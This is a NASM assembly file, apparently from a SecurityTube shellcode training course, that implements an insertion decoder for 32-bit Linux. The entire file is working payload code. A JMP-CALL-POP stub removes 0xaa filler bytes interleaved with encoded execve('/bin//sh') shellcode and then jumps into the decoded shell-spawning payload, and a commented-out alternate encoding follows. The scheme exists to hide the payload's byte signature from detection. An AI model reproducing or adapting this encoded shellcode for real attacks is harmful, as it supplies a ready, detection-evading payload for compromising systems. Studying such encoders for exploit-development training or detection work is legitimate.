; Filename: insertion-decoder.nasm
; Author:  Vivek Ramachandran
; Website:  http://securitytube.net
; Training: http://securitytube-training.com 
;
;
; Purpose: 

global _start			
section .text

_start:
	jmp short call_shellcode

decoder:
	pop esi
	lea edi, [esi +1]
	xor eax, eax
	mov al, 1
	xor ebx, ebx

decode: 
	mov bl, byte [esi + eax]
	xor bl, 0xaa
	jnz short EncodedShellcode
	mov bl,byte [esi+eax+1]
	;xor bl,0xe1
	mov byte [edi],bl
	inc edi
	add al, 2
	jmp short decode	

call_shellcode:
	call decoder
	EncodedShellcode: db 0x31,0xaa,0xc0,0xaa,0x50,0xaa,0x68,0xaa,0x2f,0xaa,0x2f,0xaa,0x73,0xaa,0x68,0xaa,0x68,0xaa,0x2f,0xaa,0x62,0xaa,0x69,0xaa,0x6e,0xaa,0x89,0xaa,0xe3,0xaa,0x50,0xaa,0x89,0xaa,0xe2,0xaa,0x53,0xaa,0x89,0xaa,0xe1,0xaa,0xb0,0xaa,0x0b,0xaa,0xcd,0xaa,0x80,0xaa
	;EncodedShellcode: db 0xd0,0xaa,0x21,0xaa,0xb1,0xaa,0x89,0xaa,0xce,0xaa,0xce,0xaa,0x92,0xaa,0x89,0xaa,0x89,0xaa,0xce,0xaa,0x83,0xaa,0x88,0xaa,0x8f,0xaa,0x68,0xaa,0x02,0xaa,0xb1,0xaa,0x68,0xaa,0x03,0xaa,0xb2,0xaa,0x68,0xaa,0x00,0xaa,0x51,0xaa,0xea,0xaa,0x2c,0xaa,0x61,0xaa